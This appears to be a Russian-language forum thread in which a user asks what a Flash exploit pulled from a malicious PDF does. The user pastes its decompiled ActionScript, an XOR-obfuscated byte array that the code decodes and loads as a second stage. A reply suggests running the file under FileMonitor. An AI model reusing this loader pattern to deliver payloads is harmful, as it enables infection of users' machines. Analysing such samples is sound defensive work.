Доброго времени суток всем, недавно получил pdf c flash эксплоитом. Выдернул и раскомпилировал эксплоит. Но немогу понять что он делает. Точнее сказать не могу понять какую он последовательность байт куда посылает и что затем происходит. вот код эксплоита из флешки: Code: package { import flash.display.MovieClip; import flash.utils.ByteArray; import flash.display.Loader; import flash.display.*; import flash.events.*; import flash.net.*; import flash.system.*; import flash.utils.*; public class Loadzz extends MovieClip { public function Loadzz() { var _local1:ByteArray = new ByteArray(); _local1.position = 0; _local1.objectEncoding = 3; _local1.endian = Endian.BIG_ENDIAN; _local1[0] = 26; _local1[1] = 14; _local1[2] = 10; _local1[3] = 83; _local1[4] = 189; _local1[5] = 89; _local1[6] = 89; _local1[7] = 89; _local1[8] = 33; _local1[9] = 197; _local1[10] = 242; _local1[11] = 57; _local1[12] = 57; _local1[13] = 212; _local1[14] = 62; _local1[15] = 57; _local1[16] = 185; _local1[17] = 6; _local1[18] = 153; _local1[19] = 153; _local1[20] = 121; _local1[21] = 152; _local1[22] = 145; _local1[23] = 185; _local1[24] = 123; _local1[25] = 145; _local1[26] = 89; _local1[27] = 93; _local1[28] = 175; _local1[29] = 149; _local1[30] = 162; _local1[31] = 216; _local1[32] = 61; _local1[33] = 30; _local1[34] = 65; _local1[35] = 90; _local1[36] = 126; _local1[37] = 218; _local1[38] = 18; _local1[39] = 59; _local1[40] = 16; _local1[41] = 243; _local1[42] = 7; _local1[43] = 24; _local1[44] = 8; _local1[45] = 39; _local1[46] = 16; _local1[47] = 39; _local1[48] = 16; _local1[49] = 60; _local1[50] = 24; _local1[51] = 115; _local1[52] = 218; _local1[53] = 250; _local1[54] = 202; _local1[55] = 234; _local1[56] = 210; _local1[57] = 114; _local1[58] = 26; _local1[59] = 41; _local1[60] = 31; _local1[61] = 59; _local1[62] = 8; _local1[63] = 51; _local1[64] = 211; _local1[65] = 38; _local1[66] = 11; _local1[67] = 15; _local1[68] = 51; _local1[69] = 43; _local1[70] = 80; _local1[71] = 203; _local1[72] = 61; _local1[73] = 35; _local1[74] = 51; _local1[75] = 16; _local1[76] = 41; _local1[77] = 63; _local1[78] = 76; _local1[79] = 193; _local1[80] = 47; _local1[81] = 16; _local1[82] = 245; _local1[83] = 61; _local1[84] = 113; _local1[85] = 144; _local1[86] = 145; _local1[87] = 117; _local1[88] = 63; _local1[89] = 17; _local1[90] = 151; _local1[91] = 150; _local1[92] = 114; _local1[93] = 144; _local1[94] = 149; _local1[95] = 114; _local1[96] = 20; _local1[97] = 92; _local1[98] = 66; _local1[99] = 157; _local1[100] = 249; _local1[101] = 201; _local1[102] = 197; _local1[103] = 1; _local1[104] = 197; _local1[105] = 147; _local1[106] = 105; _local1[107] = 212; _local1[108] = 208; _local1[109] = 216; _local1[110] = 218; _local1[111] = 24; _local1[112] = 63; _local1[113] = 67; _local1[114] = 82; _local1[115] = 90; _local1[116] = 94; _local1[117] = 122; _local1[118] = 94; _local1[119] = 202; _local1[120] = 85; _local1[121] = 209; _local1[122] = 158; _local1[123] = 181; _local1[124] = 190; _local1[125] = 86; _local1[126] = 76; _local1[127] = 93; _local1[128] = 203; _local1[129] = 117; _local1[130] = 36; _local1[131] = 69; _local1[132] = 121; _local1[133] = 30; _local1[134] = 105; _local1[135] = 48; _local1[136] = 107; _local1[137] = 169; _local1[138] = 104; _local1[139] = 21; _local1[140] = 186; _local1[141] = 61; _local1[142] = 57; _local1[143] = 93; _local1[144] = 40; _local1[145] = 1; _local1[146] = 65; _local1[147] = 96; _local1[148] = 65; _local1[149] = 218; _local1[150] = 157; _local1[151] = 164; _local1[152] = 254; _local1[153] = 80; _local1[154] = 104; _local1[155] = 41; _local1[156] = 233; _local1[157] = 232; _local1[158] = 216; _local1[159] = 93; _local1[160] = 97; _local1[161] = 33; _local1[162] = 33; _local1[163] = 33; _local1[164] = 129; _local1[165] = 24; _local1[166] = 11; _local1[167] = 69; _local1[168] = 181; _local1[169] = 87; _local1[170] = 111; _local1[171] = 121; _local1[172] = 4; _local1[173] = 53; _local1[174] = 107; _local1[175] = 138; _local1[176] = 1; _local1[177] = 64; _local1[178] = 129; _local1[179] = 24; _local1[180] = 11; _local1[181] = 231; _local1[182] = 57; _local1[183] = 26; _local1[184] = 219; _local1[185] = 69; _local1[186] = 217; _local1[187] = 21; _local1[188] = 89; _local1[189] = 253; _local1[190] = 230; _local1[191] = 114; _local1[192] = 168; var _local2:* = 0; while (_local2 < 193) { _local1[_local2] = (_local1[_local2] ^ 89); _local2 = (_local2 + 1); }; var _local3:Loader = new Loader(); _local3.loadBytes(_local1, new LoaderContext(false)); addChild(_local3); } } }//package
как узнать, что делает флеш-аппликация? запустить сперва FileMonitor, и потом ту флеш. на ваших глазах будет продемонстрировано - в какие файлы рвется аппликация. FileMonitor - отличная вещь в руках крекеров и любознательных парней. и да, truelamer, сделаете это своими руками.
